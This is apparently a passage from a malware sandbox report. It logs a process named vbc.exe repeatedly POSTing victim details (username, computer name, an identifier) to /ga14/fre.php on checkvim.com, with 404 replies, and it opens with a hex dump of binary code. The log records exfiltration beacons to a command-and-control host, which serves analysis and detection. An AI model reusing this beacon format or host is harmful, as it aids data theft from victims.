                    Sep 28, 2021 06:50:21.920475960 CEST14INData Raw: c0 85 c0 74 0a 8b 58 08 89 5d fc 85 db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 18 c6 41 00 8b 3d 1c c6
                    Data Ascii: tX]u3u`3@N`MMN`HA=A;}$k~\d9=AAB;|]~d=uFd^=uFdN=uFd>=uFd.=uFd=uFd=uFd
                    Sep 28, 2021 06:50:21.920610905 CEST15INData Raw: f4 ff d6 89 45 f8 3b c3 74 2f 50 e8 8d 08 00 00 59 89 45 fc 3b c3 74 21 53 53 ff 75 f8 50 ff 75 f4 57 53 53 ff d6 85 c0 75 0c ff 75 fc e8 dd 07 00 00 59 89 5d fc 8b 5d fc 57 ff 15 f0 80 41 00 8b c3 eb 5c 83 f8 02 74 04 3b c3 75 82 ff 15 30 80 41
                    Data Ascii: E;t/PYE;t!SSuPuWSSuuY]]WA\t;u0A;r8t@8u@8u+@PE&Y;uVAEuVW)VA_^[VPAPAW;st;r_^VXAXAW;st;r_^


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.22491665.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:29.583741903 CEST220OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 176
                    Connection: close
                    Sep 28, 2021 06:50:29.650866032 CEST220OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: 'ckav.ruAlbus367706ALBUS-PCk0DE4229FCF97F5879F50F8FD3DiReQ
                    Sep 28, 2021 06:50:29.928668976 CEST220INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 15
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.22491755.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:38.967765093 CEST232OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:39.035662889 CEST233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:39.323179007 CEST233INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:50 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    100192.168.2.22492655.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:37.050080061 CEST357OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:37.116173983 CEST357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:37.397901058 CEST358INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:48 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    101192.168.2.22492665.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:37.662482977 CEST358OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:37.733764887 CEST359OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:38.023428917 CEST359INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    102192.168.2.22492675.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:38.305464029 CEST360OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:38.375013113 CEST360OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:38.651947021 CEST360INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:50 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    103192.168.2.22492685.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:38.916392088 CEST361OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:38.980259895 CEST362OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:39.290410995 CEST362INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:50 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    104192.168.2.22492695.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:39.553833008 CEST363OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:39.625255108 CEST363OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:39.922492027 CEST363INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:51 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    105192.168.2.22492705.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:40.503875017 CEST364OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:40.567614079 CEST364OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:40.856189013 CEST365INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    106192.168.2.22492715.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:41.115943909 CEST365OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:41.186342001 CEST366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:41.467150927 CEST366INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    107192.168.2.22492725.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:41.724808931 CEST367OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:41.795272112 CEST367OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:42.107495070 CEST367INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:53 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    108192.168.2.22492735.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:42.375556946 CEST368OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:42.439167976 CEST368OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:42.736668110 CEST369INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    109192.168.2.22492745.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:42.995198965 CEST370OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:43.058247089 CEST370OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:43.355303049 CEST370INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.22491765.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:39.638770103 CEST234OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:39.706209898 CEST234OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:40.025614023 CEST234INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:51 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    110192.168.2.22492755.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:43.599920034 CEST371OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:43.667057037 CEST371OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:43.963711023 CEST372INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:55 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    111192.168.2.22492765.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:44.227576017 CEST372OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:44.302570105 CEST373OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:44.594954967 CEST373INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:55 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    112192.168.2.22492775.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:44.852768898 CEST374OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:44.916249990 CEST374OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:45.233309984 CEST374INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    113192.168.2.22492785.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:45.497066021 CEST375OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:45.563618898 CEST375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:45.847830057 CEST376INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    114192.168.2.22492795.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:46.098823071 CEST376OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:46.162790060 CEST377OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:46.445576906 CEST377INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    115192.168.2.22492805.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:46.731312037 CEST378OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:46.802370071 CEST378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:47.075848103 CEST378INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:58 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    116192.168.2.22492815.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:47.365120888 CEST379OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
